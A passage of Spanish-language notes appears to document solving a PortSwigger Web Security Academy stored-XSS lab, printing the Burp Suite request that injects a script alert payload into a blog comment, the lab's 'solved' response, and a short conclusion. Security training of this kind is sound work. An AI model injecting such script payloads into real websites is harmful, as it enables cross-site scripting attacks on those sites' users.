🤯EXPLOTACION

  • BURP SUITE --------------------------------->https://portswigger.net/web-security --->PDF-TOOL

    REQUEST:
    
    
    POST /post/comment HTTP/1.1
    Host: 0a9f006203c52313803221f800f20052.web-security-academy.net
    Cookie: session=gVRGbyObaBk8uOuMZCOyN6GCDLL89rnM
    Content-Length: 171
    Cache-Control: max-age=0
    Sec-Ch-Ua: "Chromium";v="118", "Google Chrome";v="118", "Not=A?Brand";v="99"
    Sec-Ch-Ua-Mobile: ?0
    Sec-Ch-Ua-Platform: "Linux"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
    Origin: https://0a9f006203c52313803221f800f20052.web-security-academy.net
    Content-Type: application/x-www-form-urlencoded
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Referer: https://0a9f006203c52313803221f800f20052.web-security-academy.net/post?postId=1
    Accept-Encoding: gzip, deflate, br
    Accept-Language: es-419,es;q=0.9,en;q=0.8
    Connection: close
    
    csrf=5aGK2T2ryPOp8qacwVPwWi9aaiShRntn&postId=1&comment=<script>alert('XSS_por_P4IM0N')</script>&name=PAIMON&email=P4IM0N%40hotmail.com&website=https%3A%2F%2Fp4imon-d-m-python.herokuapp.com%2F
    
    
    
    
    GET /post/comment/confirmation?postId=1 HTTP/2
    Host: 0a9f006203c52313803221f800f20052.web-security-academy.net
    Cookie: session=gVRGbyObaBk8uOuMZCOyN6GCDLL89rnM
    Cache-Control: max-age=0
    Sec-Ch-Ua: "Chromium";v="118", "Google Chrome";v="118", "Not=A?Brand";v="99"
    Sec-Ch-Ua-Mobile: ?0
    Sec-Ch-Ua-Platform: "Linux"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
    Origin: https://0a9f006203c52313803221f800f20052.web-security-academy.net
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Referer: https://0a9f006203c52313803221f800f20052.web-security-academy.net/post/comment
    Accept-Encoding: gzip, deflate, br
    Accept-Language: es-419,es;q=0.9,en;q=0.8
    
    
    
    
    RESPONSE:
    
    
    HTTP/2 200 OK
    Content-Type: text/html; charset=utf-8
    X-Frame-Options: SAMEORIGIN
    Content-Length: 5880
    
    <!DOCTYPE html>
    <html>
        <head>
            <link href=/resources/labheader/css/academyLabHeader.css rel=stylesheet>
            <link href=/resources/css/labsBlog.css rel=stylesheet>
            <title>Stored XSS into HTML context with nothing encoded</title>
        </head>
        <body>
            <script src="/resources/labheader/js/labHeader.js"></script>
            <div id="academyLabHeader">
                <section class='academyLabBanner is-solved'>
                    <div class=container>
                        <div class=logo></div>
                            <div class=title-container>
                                <h2>Stored XSS into HTML context with nothing encoded
                                 class=notification-labsolved-hidden>
                    <div class=container>
                        <h4>Congratulations, you solved the lab!</h4>
                        <div>
                            <span>
                                Share your skills!
                            </span>
                            <a class=button href='
                                               <header class="notification-header">
                        </header>
                        <h1>Thank you for your comment!</h1>
                        <p>Your comment has been submitted.</p>
                        <div class="is-linkback">
                            <a href="/post?postId=1">Back to blog</a>
                        </div>
                    </div>
                </section>
                <div class="footer-wrapper">
                </div>
            </div>
        </body>
    </html>
    • CONCLUSION: INTENTAMOS INYECTAR LA CARGA UTIL (<script>alert('XSS_por_P4IM0N')</script>) y LOGRAMOS EL XSS ALMACENADO, SE TENZO RESOLVIMOS EL LABORATORIO.

Last updated